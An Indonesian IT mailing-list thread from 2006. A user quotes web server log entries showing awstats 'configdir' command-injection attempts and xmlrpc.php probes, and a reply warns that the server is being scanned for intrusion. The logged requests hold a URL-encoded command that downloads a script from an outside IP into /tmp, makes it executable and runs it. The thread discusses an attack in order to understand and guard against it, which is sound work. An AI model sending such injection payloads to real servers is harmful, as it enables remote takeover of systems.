----- Original Message ----- From: "Erwin Budiarto" <[EMAIL PROTECTED]> Sent: Monday, January 23, 2006 8:30 AM
> dear ITers > > di file access_log serverku koq sering ada akses > seperti ini. apaan ya.... > padahal aku ga pasang blog dll. > mohon pencerahan. > > 140.164.31.120 - - [23/Jan/2006:06:53:05 +0700] "GET > /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e10 2%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;ech o| > HTTP/1.1" 404 290 > 140.164.31.120 - - [23/Jan/2006:06:53:06 +0700] "GET > /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e10 2%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;ech o| > HTTP/1.1" 404 290 > 140.164.31.120 - - [23/Jan/2006:06:53:08 +0700] "GET > /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20 194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%2 0YYY;echo| > HTTP/1.1" 404 298 > 140.164.31.120 - - [23/Jan/2006:06:53:10 +0700] "POST > /xmlrpc.php HTTP/1.1" 404 37 > 140.164.31.120 - - [23/Jan/2006:06:53:12 +0700] "POST > /blog/xmlrpc.php HTTP/1.1" 404 287 > 140.164.31.120 - - [23/Jan/2006:06:53:13 +0700] "POST > /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 294 > 140.164.31.120 - - [23/Jan/2006:06:53:15 +0700] "POST > /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 295 > 140.164.31.120 - - [23/Jan/2006:06:53:16 +0700] "POST > /drupal/xmlrpc.php HTTP/1.1" 404 289 > 140.164.31.120 - - [23/Jan/2006:06:53:18 +0700] "POST > /phpgroupware/xmlrpc.php HTTP/1.1" 404 295 > 140.164.31.120 - - [23/Jan/2006:06:53:19 +0700] "POST > /wordpress/xmlrpc.php HTTP/1.1" 404 292 > 140.164.31.120 - - [23/Jan/2006:06:53:21 +0700] "POST > /xmlrpc.php HTTP/1.1" 404 37 > 140.164.31.120 - - [23/Jan/2006:06:53:22 +0700] "POST > /xmlrpc/xmlrpc.php HTTP/1.1" 404 289 > 140.164.31.120 - - [23/Jan/2006:06:53:23 +0700] "POST > /xmlsrv/xmlrpc.php HTTP/1.1" 404 289 Itu sih ada yang sedang ngintai server anda tuh dgn metode inject, dia memanfaatkan vulnerable-nya OS, hati2 loh, harus segera diambil tindakan sebelum diambil alih kendali ama dia, cari aja di google utk antisipasinya, biasanya solusinya ada di site hacker tuh. Semoga Membantu Wassalam IT Freelancer On-Line YM! : big_hunter_cmi ICQ: 208628371 -- www.itcenter.or.id - Komunitas Teknologi Informasi Indonesia Info, Gabung, Keluar, Mode Kirim : [EMAIL PROTECTED] :: Hapus bagian yang tidak perlu (footer, dst) saat reply! :: ## Jobs: itcenter.or.id/jobs ## Bursa: itcenter.or.id/bursa ## $$ Iklan/promosi : www.itcenter.or.id/sponsorship $$ [@@] Jaket ITCENTER tersedia di http://shop.itcenter.or.id Yahoo! Groups Links <*> To visit your group on the web, go to: http://groups.yahoo.com/group/ITCENTER/ <*> To unsubscribe from this group, send an email to: [EMAIL PROTECTED] <*> Your use of Yahoo! Groups is subject to: http://docs.yahoo.com/info/terms/
